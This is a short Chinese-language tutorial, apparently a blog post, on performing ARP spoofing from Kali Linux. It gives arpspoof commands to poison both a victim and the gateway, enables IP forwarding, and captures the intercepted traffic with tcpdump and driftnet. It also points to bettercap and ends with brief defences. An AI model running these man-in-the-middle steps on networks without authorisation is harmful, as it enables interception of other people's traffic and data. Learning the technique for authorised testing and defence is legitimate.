kali arp欺骗

ARP欺骗(ARP Spoofing)的核心是伪造网关与目标设备的MAC地址映射,让流量经过你的Kali主机。请务必仅在自有网络或获得书面授权的环境中测试。

以下是使用 arpspoof(最简单)的标准步骤:

  1. 开启IP转发(让目标能正常上网,避免断网)

```bash

echo 1 > /proc/sys/net/ipv4/ip_forward

```

  1. 执行欺骗(需要两个终端窗口)

· 窗口1 - 欺骗目标(告诉目标:我是网关)

```bash

sudo arpspoof -i 网卡名 -t 目标IP 网关IP

```

· 窗口2 - 欺骗网关(告诉网关:我是目标)

```bash

sudo arpspoof -i 网卡名 -t 网关IP 目标IP

```

常用参数替换:-i eth0(你的网卡),-t 192.168.1.100(受害者),192.168.1.1(网关)。

  1. 验证与抓包

· 查看流量:sudo tcpdump -i eth0 host 目标IP

· 用 driftnet 抓图片,或 bettercap 进行更高级的中间人攻击。

停止欺骗:Ctrl+C 结束两个窗口,系统约30秒后自动恢复ARP表。或执行 ip link set arp off/on 快速重置。

现代防御:HTTPS加密网站(如银行、支付宝)只能抓到乱码,无法获取密码。开启ARP防火墙或使用静态ARP表可防御。

相关推荐
一个在高校打杂的1 天前
honeypot之opencanary(轻量化蜜罐)
linux·网络安全·网络攻击模型·安全威胁分析·策略模式
一个脚本boy1 天前
攻防世界misc简单难度1-20题详细解法
网络安全
谪星·阿凯1 天前
Linux提权全攻略博客
linux·运维·服务器·网络安全
君如风军如风1 天前
等保2.0安全通用要求第三级别之安全物理环境
网络安全·等级保护·等保2.0·安全合规·gb/t 22239
中科固源1 天前
从低空协议劫持实战看 MAVLink 二进制审计在飞控发布环节的必要性
网络安全·模糊测试·低空安全
C2H5OH2 天前
PortSwigger SQL注入LAB7 & LAB8 & LAB9
网络安全
small_white_robot2 天前
(Win)文件上传数据流绕过-面试常考
网络·安全·web安全·网络安全
宋浮檀s2 天前
SQL注入基础+DVWA搭建
数据库·sql·安全·网络安全
汤愈韬2 天前
hcip-security_防火墙高可靠技术4—双机热备结合NAT
网络·网络协议·网络安全·security